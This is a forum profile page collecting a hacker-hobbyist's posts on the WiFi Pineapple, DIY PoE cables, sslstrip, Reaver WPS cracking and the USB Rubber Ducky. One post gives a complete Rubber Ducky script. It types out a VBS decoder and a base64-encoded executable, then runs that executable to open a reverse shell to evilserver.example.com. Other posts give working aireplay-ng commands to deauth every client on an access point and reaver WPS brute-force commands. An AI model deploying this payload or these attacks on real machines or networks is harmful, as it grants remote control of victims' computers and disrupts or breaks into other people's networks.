-
Posts
803 -
Joined
-
Last visited
-
Days Won
12
Posts posted by telot
-
-
Well my whole thing is when are they going to have the new ones come out. I really would like to buy one. At the moment i'm trying to read on it before I get it. that way i could undestand how it works. I'm a little confuse on one thing. After watching the videos of darren at the airport and stuff. I notice he has the pineapple connected to his laptop. I get that all the other laptop , and device will connect to the pineapple. But does your laptop have to be connected to the ssid to give those device who are connecting to the pineapple internet access?
if you're playing the man in the middle I guess you would have to be running wireshark to catch all the urls and, passwds correct? it would be nice to have some videos once you get it, and how it works. I know when i bought the alfa card the dvd was the best thing to help me understand how it worked, and the examples Darren had.
I been waiting to buy my first pineapple, but does anyone know when they might have them in stock again?
You dont connect to the ssid of the pineapple. Your laptop is connected to a (non pineapple) access point via its internal wifi adapter to get internet to the laptop. The pineapple is then plugged in via ethernet cable to the laptop. Configure laptop (if in linux, run ./wp3.sh from wifipineapple.com for easy mode) for ICS (internet connection sharing) thereby bridging your laptops wifi adapter internet through to the ethernet port on the laptop, and over to the pineapple. The pineapple then creates its own access point and begins pineappleing the world around you.
telot
-
Pineapple runs hostapd instead of airbase-ng due to stability if I'm not mistaken.
And I can understand why. I've been playing with airbase-ng for a few days now, and I've found it to be very unreliable. Sometimes my dhcp server plays nice, sometimes it doesnt. When it doesn't, sometimes certain devices will autoassign themselves an IP (169.xxx.xxx.xxx range) and sometimes that same device refuses, and other devices simply will not play ball at all. Whilst wiresharking all these inconsistencies I noticed erratic behavior from airbase as the common denominator. Its a great tool, but I don't think its nearly as refined as other tools in the aircrack suite (such as airmon, airodump, and of course aircrack). Its definitely best to stick with the pineapple.
You can use the butt end of a screw driver to pound in a nail, and still use that screwdriver for many other things (screwing screws, pry bar, inner ear scratcher) but using a tool that was built with pounding a nail in mind works much better and is worth the cost.
telot
-
Laptop can easily respond to any probe request and respond by initializing a authentication request and then an association request. See airbase-ng. The pineapple is just so damn convenient and awesome. I can attach a high db gain antenna, I can automate it easier, as it's purpose is focused, and there's a great community based around it (ahem). Yes, there's lots of reasons to go with the pineapple.
telot
-
Yeah, the best thing would to be a screen that is used on house windows or something. Also finding the low profile type fan may be hard to find. You might have to trim some of the plastic to get it to fit properly.
The reason for the offset hole is because of some components on the inside. Also the fans I used were a perfect match because it actually gave some room to let air flow through the fan; unlike this other 5V fan I had.
And yes, the temp differences were amazing. From ~130F/54.4C to ~90F/32.2C on the OM1P with 2.0.1 firmware after 3 hours.
The best part about this mod is that it was pretty simple if you have the tools (mostly the drill bits) and take apart the plastic connector to have the crimp on pins still attached. And using the VCC and GND on the board was a HUGE "DUH!" moment when I was trying to find an external way to power this. Finally it clicked that it should have ~5V on that pin I had totally forgot about.
The OM1P was the first one I did. Took about an hour (not counting adhesive drying time). The AP51 was modded up in about 10 minutes (minus adhesive drying time) because I knew when the taper bit hit the block of wood going through the PVC pipe, it was the correct size. Which that part worked out by chance.
Badassness. Well done sir!
telot
-
I received this comment from the man himself...
"Both use HSTS headers now, so if you're using a browser that supports them (like Chrome), there's no opportunity for sslstrip to do anything. That output is from Twisted,and it doesn't indicate any actual problem."
UPDATE1:
http://www.owasp.or...nsport_Security
UPDATE2:
SSLStrip still works against Safari
Definitely broken with FF and Chrome tho : (
Now what?
UPDATE3:
"HSTS fixes this problem by informing the browser that connections to the site should always use SSL. Of course, the HSTS header can be stripped by the attacker if this is the user's first visit.Chrome attempts to limit this problem by including a hard-coded list of HSTS sites.[11] Unfortunately this solution cannot scale to include all websites on the internet; a more workable solution can be achieved by including HSTS data inside DNS records, and accessing them securely via DNSSEC."
Thanks for following through on this Diggler! I was just going to get into sslstrip this weekend, so this is some great food for thought. Thanks very much
telot
-
Man. I have done terrible, terrible things for pitchers of margaritas.
If I would have just known setting security for a router would have gotten me that, I would need a lot less shots every time I go to the doctor's.
rofl was thinking the same damn thing...
telot
-
Telot : can you help me with this ? because i cant't find any configuration for "entire access point deauthing" :( :(
i just tested deauth 1 AP and it work how can i deauth entire access point, someone ?
0xphk is correct. By leaving the Client Mac field blank, and just filling in the access points BSSID, I was able to kick every client off the access point with one click. So the pineapple just ran a simple command of: aireplay-ng -0 30 -a XX:XX:XX:XX:XX:XX mon0 where -0 means deauth, 30 is the number of deauths to send (I like to just hammer my AP's lol) -a is the access point, which if left without a -c for client mac address, will deauth the entire access point. I'm sorry if I wasn't very specific in the comment, currently I cannot get airdrop-ng to work, that would deauth every accesspoint and every client on every access point, which I think you might be eluding to here. I'll keep working on it, but as I'm back to work now, I've got a lot less time to play with my pineapple :( Has anyone else gotten airdrop-ng to work on the mark3?
telot
-
Let me ask you this, websites like backtrack-linux.org, hackersforcharity.org, social-engineer.org, secmaniac.com, lares.com, makeiturz.com, etc, what do they all have in common? They were created in notepad++, not a wysiwyg program. I code all my sites by hand. Would you say the results of those sites are "really shitty"?
WYSIWYG is just that, but if you want you want to make web pages without having to know how to code and make a web page, then buy Photoshop and Dreamweaver and it pretty much does all the work for you. If you want to learn how to code custom websites, then use notepad and read up on coding in xhtml, css, php and javascript.
Ok ok ok, you got me. Let me rephrase it. If you don't know what you're doing and you code it in notepad, it'll be really shitty. I didn't at all mean to step on any notepad enthusiasts toes. I was more addressing the OP, and his want to quickly and easily come up with a decent looking webpage. If you want to really excel at it, by all means notepads the way to go - if you just want to make a quicky website for a friend/family member - wysiwyg is the best bet.
telot
-
I'm doing Defcon and Derby as well. We should arrange a hak5forums hang time at Derby! Grab a few beers? Try and get some suckers onto our pineapples? hehe
telot
-
Just a thought, How about a rasbery pi running ARM BT5 ........
Haha I thought if I mentioned the raspberry pi + pineapple combo one more time, I'd be accused of being a broken record.
YES YES and more YES. Its going to be awesome.
telot
-
If you want to see an example of a website created entirely in notepad++, checkout my awful website at telot.org!
Haha seriously, don't make a website entirely in notepad++...its really shitty - both the process of making it, and the result :)
If you're looking for a WYSIWYG (what you see is what you get) or GUI based website creator - checkout NVU. Its free, easy to use, and has a section where you can upload the page you just created to your web server. So no need to upload via SCP or SFTP or anything. Enjoy!
telot
-
Hi Telot.
Well i made a similar cabel for the Mk1 And i am curently using it for the mk111. Just a idea, If you use a dual corded USB cabel, The voltage messured on mine is now 8,7 V, It is Stabel and working 100% i used a short cabel since i have the AP51 attached to the back of my screen using a suction cup.
Thats badass! I should've tested the dual usb cable...an electrical engineer friend of mine told me the dual usb just increased the current going down the line, not the voltage. Turns out he must be a liar! Thanks for the heads up Thetra!
telot
-
This is great, thanks telot!! Nice work and thanks for sharing!! :)
No problem hfam, its my pleasure. So it is also my pleasure to share my latest version of this cable :)
This time I used the wind-up ethernet cable that came with the pineapple, as its much cleaner look. Enjoy!
www.telot.org/betterusbpoecable1.jpg
www.telot.org/betterusbpoecable2.jpg
www.telot.org/betterusbpoecable3.jpg
www.telot.org/betterusbpoecable4.jpg
www.telot.org/betterusbpoecable5.jpg
telot
-
Im not in the UK, so its a bit difficult to relate. But you should checkout the raspberrypi foundation. They are a UK charity that is creating a very inexpensive computer for educational purposes (and hacking/making too :) ). Perhaps you could coordinate your curriculum with the raspberry pi in mind, or offer to run a pilot project with them or something. Their website is www.raspberrypi.org
Hope it proves fruitful
lolz fruitful
telot
-
Electrical tape is evil.
Heat shrink works much better, and doesn't get sticky after a week or so.
Agreed! I ran out of shrink tube during the tutorial though :( This was more of a proof of concept - next I'm going to mod the wind-up ethernet cable that came with the pineapple. That will be done with all heat shrink for sure.
telot
-
1. That session resume feature is included only in the commercial version. Which I just read (but havent confirmed) that the source for the commercial is now available as well. I'll give it a shot asap
2. So ars reset the router when needed? I guess if your attack wasn't working and there were other (legitimate) users on the access point, you could deauth them off with aireplay -0, though I'm not sure how the deauth would effect the reaver. If they a legit user was deauth'd for long enough, eventually the AP would get reset. Not sure how many times that will work though, and vastly increases the risk. So no reaver'ing after hours if thats the case.
3. 1.3 beta is what I have at the moment - I'll check to see if theres any updates when I get home (mobile right now). Fingers crossed!
I agree, they are definitely working out the bugs, as reaver is hot off the presses. Its exciting to be using cutting edge tools though, gotta say.
telot
-
Hey all - I just got my ducky today. I ran my hello world and all that jazz. Next I went to get the reverse shell script to work (the one on the wiki) in windows7 64bit. I found that you can't run reverse.exe in a 64bit cmd.exe. Instead, you have to run this program: %windir%\SysWoW64\cmd.exe which will allow it to run. I've incorporated the work around into the script, via a gui r command. The script in its entirety is found below. Enjoy
telotESCAPE CONTROL ESCAPE DELAY 400 STRING cmd DELAY 400 MENU DELAY 400 STRING a DELAY 300 ENTER DELAY 600 LEFTARROW ENTER DELAY 400 STRING copy con c:\decoder.vbs ENTER STRING Option Explicit:Dim arguments, inFile, outFile:Set arguments = WScript.Arguments:inFile = arguments(0) STRING :outFile = arguments(1):Dim base64Encoded, base64Decoded, outByteArray:dim objFS:dim objTS:set objFS = STRING CreateObject("Scripting.FileSystemObject"): ENTER STRING set objTS = objFS.OpenTextFile(inFile, 1):base64Encoded = STRING objTS.ReadAll:base64Decoded = decodeBase64(base64Encoded):writeBytes outFile, base64Decoded:private function STRING decodeBase64(base64): ENTER STRING dim DM, EL:Set DM = CreateObject("Microsoft.XMLDOM"):Set EL = DM.createElement("tmp"): STRING EL.DataType = "bin.base64":EL.Text = base64:decodeBase64 = EL.NodeTypedValue:end function:private Sub STRING writeBytes(file, bytes):Dim binaryStream: ENTER STRING Set binaryStream = CreateObject("ADODB.Stream"):binaryStream.Type = 1: STRING binaryStream.Open:binaryStream.Write bytes:binaryStream.SaveToFile file, 2:End Sub ENTER CTRL z ENTER STRING copy con c:\reverse.txt ENTER STRING TVprZXJuZWwzMi5kbGwAAFBFAABMAQIAAAAAAAAAAAAAAAAA4AAPAQsBAAAAAgAAAAAAAAAA ENTER STRING AADfQgAAEAAAAAAQAAAAAEAAABAAAAACAAAEAAAAAAAAAAQAAAAAAAAAAFAAAAACAAAAAAAA ENTER STRING AgAAAAAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAAAAAA20IAABQAAAAAAAAAAAAAAAAA ENTER STRING AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ENTER STRING AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAATUVXAEYS ENTER STRING 0sMAMAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA4AAAwALSdduKFuvUABAAAABAAADvAgAA ENTER STRING AAIAAAAAAAAAAAAAAAAAAOAAAMC+HEBAAIvera1QrZeygKS2gP8Tc/kzyf8TcxYzwP8TcyG2 ENTER STRING gEGwEP8TEsBz+nU+quvg6HI+AAAC9oPZAXUO/1P86yas0eh0LxPJ6xqRSMHgCKz/U/w9AH0A ENTER STRING AHMKgPwFcwaD+H93AkFBlYvFtgBWi/cr8POkXuubrYXAdZCtlq2XVqw8AHX7/1PwlVatD8hA ENTER STRING WXTseQesPAB1+5FAUFX/U/SrdefDAAAAAAAzyUH/ExPJ/xNy+MOwQgAAvUIAAAAAAAAAQEAA ENTER STRING MAFAAAAQQAAAEEAAaBwGMkAHagHoDnw4VQzoQgLIFTiean446lMMelAsFnRBMP0Bv1WysTNq ENTER STRING kQIGsnxVmiejeINmxwVke0+mOGe8XVBmlD05ZqNofmRmfiF9i3MM2QpqaJQtoTp6b0gV6kwF ENTER STRING EVBkkBBNRFWRFDxAeGooEGhdKP81MHTopJ5RVFWhVY2/bg4KCJAiC+FRFOgfgUvD/yUkILtv ENTER STRING KhwGQxghFL3DIghxzAFVi+yBxHz+/4hWV+hgrN2JRfwzHcmLdX44PB10Bx4iQPdB6/RR0XLp ENTER STRING AOFYO8F0C19eMLgDucnCCOGGSY29PHDlQyoJzy/gArAgqutz8iiNhRU5i/A2+DMqM+sbiwNm ENTER STRING MgfvImUgTf4iEeEoLe2UCIO53LcwS3T7OzpNCKgVWWUdZwpME0EdDxTr5qoNNgcZhzj0sH/A ENTER STRING VXMRi30Mxhe4An+CohOdaLCgWDQzDUYN5tH34f5Yo+7nRLsfFqnOEQTeVQE81BTUDhszwE7s ENTER STRING hwtw0ooGRj08ArMSDvffkOsLLDAZjQyJBkiDLQrAdfHoBBEzUcI44jCDxAf0avXoaQkZSf+9 ENTER STRING gqogC9Aqk3U3+FAinSmGBvzoTS9oiyQ45lMaDwiNUAMhGIPABOP5//6AAvfTI8uB4USAdHzp ENTER STRING bMEMYHV3BvQQwEAC0OEbwlFbOkfESRnKDFcGCDAAADBAAGMwbWQAZj9AABQ4IEADd3MyXzOY ENTER STRING LmRs48CAZwdldGhvc0BieW5he23PHmOePPfr/w4SV1NBXc9hckZ1cBh5aMoscxNPJmNrYu/B ENTER STRING /7gDbJUacspebEzHV9NpdPNGp7yRR8NMQ29tiGFuZDZMaURifoB2cvudOlC3gudzFUFYIcBk ENTER STRING SNBDL2AAAAAAAGY/QABMb2FkTGlicmFyeUEAR2V0UHJvY0FkZHJlc3MAAAAAAAAAAAAAAAAA ENTER STRING AAxAAADpdL7//wAAAAIAAAAMQAAA ENTER CTRL z ENTER STRING cscript c:\decoder.vbs c:\reverse.txt c:\reverse.exe ENTER STRING exit ENTER GUI r DELAY 50 STRING %windir%\SysWoW64\cmd.exe ENTER DELAY 200 STRING c:\reverse.exe evilserver.example.com 8080 ENTER STRING exit ENTER
-
In another thread we were discussing POE to the pineapple. Here is my hacked cable that is POE and as a bonus, derives its power from a spare USB port. You can find the tutorial on my website, telot.org. Direct link: www.telot.org/usbpoehack.html
Also, apologies to my lower resolution brothers, the pics in this tutorial are huge as I didn't want to lose out on some of the detail.
Enjoy!
telot
-
Which OS are you running? As mentioned before trying both Windows XP and BT5r1
Are you setting up an internet (wlan0?) connection first before connecting the pineapple? Yes, wlan0
Are you using the wp3.sh script? Yes, tried it a few times, rebooting each time for a clean slate. I get the same error as the OP, "Destination Host Unreachable".
Thanks
I often have to run the wp3.sh script several times before it will work. Not really sure why, but I usually have to do it 2 or 3 times before I get a ping back. Try it a few times, without rebooting it inbetween tries.
telot
-
Association log confirmed not working. Everything else Karma related seems to be working great. I fired up my 'victim' test box and it got karma'd immediately upon bootup. Testing some deauth goodness now :)
EDIT: I changed the AP channel to 6, to match my router I'm trying to deauth. I rebooted the pineapple to ensure the changes took effect. Now association log is working fine. Strange...
EDIT#2: Entire access point deauth'ing successful. Karma didn't stop or miss a beat whatsoever. Now I'll try deauthing a particular client on that access point. Things are looking good Seb!
EDIT#3: Specifying a client works beautifully. :)
telot
-
Think we can do anything with it?
http://www.alfa.com.tw/in/front/bin/ptdetail.phtml?Part=R36&Category=105483
Processor: Ralink RT3050F @ 320Mhz
Flash: MXIC MX29LV640EBTI-70G (not sure what size)
RAM: EtronTech EM63A165TS-6G
One USB port
One Serial Port @ 115200bps
One WAN
One LAN
2 buttons - reset to factory default and one for the WPS
I'm seeing an interceptor with cellular internet connection via USB dongle for vpn'ing in and using the wifi for a pineapple. Everything rolled into one, with access to it from anywhere in the world :) Lets DO EET!
telot
-
According the the Reaver creator, it should not take more than 10 hours to recover the password, if its taking way longer than there must be something wrong.
I'm using the rtl8187 driver for the alfa usb 036H. The router I'm using is a crappy old WNDR2000 with WPS enabled. I'm thinking its something option in my command.
sudo ./reaver -i mon0 -b XX:XX:XX:XX:XX -t 3 -d 10 -vv
Anything in that command stand out as totally wrong? I've modified the -t to 4 and 5, and changed the -d from 0 to 15.
And about the DoS'ing the router - I'm pretty sure that is what is happening. The router does NOT function as normal until I reset it (sometimes it requires pushing in the Full Restore hard reset button). Is this avoidable through the above operators (-d and -t)? I read somewhere (frantically searching for link, but cannot find it) that reaver can break crappier (slow, old, cheap) routers, but more robust routers handle the PIN trials just fine. Have any of you got it work on certain routers but not others?
I agree with Bobbyb - this could be the exploit of the year/decade if it works out, particularly for us wifi scoundrels. Thanks for your comments thus far, and for any further insight you can share.
telot
-
Update:
Log has been fixed, I will update the first post in a few minutes
Swoot! Thank you very much Seb. I will try out this new version as soon as its posted.
Mr. Protocol/Seb - sign me up for the dev team as well! Enthusiastic and driven beta tester right here! :)
telot
-
Hi everyone
I saw in tech specs of the AP51 that it supports PoE (Power over Ethernet) and was wondering if anyone has tried that route yet? I saw a PoE adapter made by Alfa for $24.99 Link and would this be the right thing to get for this device? and would there be a way to get this to power off of my laptop's ethernet port or do laptop ethernet ports not support pins 4,5 and 7,8 for power and return? Just thought it would be smart to power and use the pineapple off of one port and use what alfa gave us.
Thanks
Pacmandu
POE is extremely simple. Way more simple than people make it out to be imho. Laptops do not support power over 4,5 and 7,8 - however it'd be real simple to wire in the 5v from your USB port into a ethernet cable and have that bring power down to your pineapple. I power mine with a hacked USB cable - this solution just removes that extra cable from the situation. This solution would be particularly effective if you wanted to have your pineapple very very far away from the computer you're sniffing with. I just may build one of these cables this afternoon. If I do, I'll certainly post pics/tutorial :)
Here is a great guide on getting started with POE.
http://tuxgraphics.org/electronics/200903/hobby-poe.shtml
telot
Reaver Brute Force Attack Tool Cracking:
in Security
Posted
Thanks very much for posting your research Vodmya. You motivated me to pick it up again (especially now that resumes working well! woo!). Did you happen to record which settings (I imagine -d and -t?) worked for which router models? Thanks again man
telot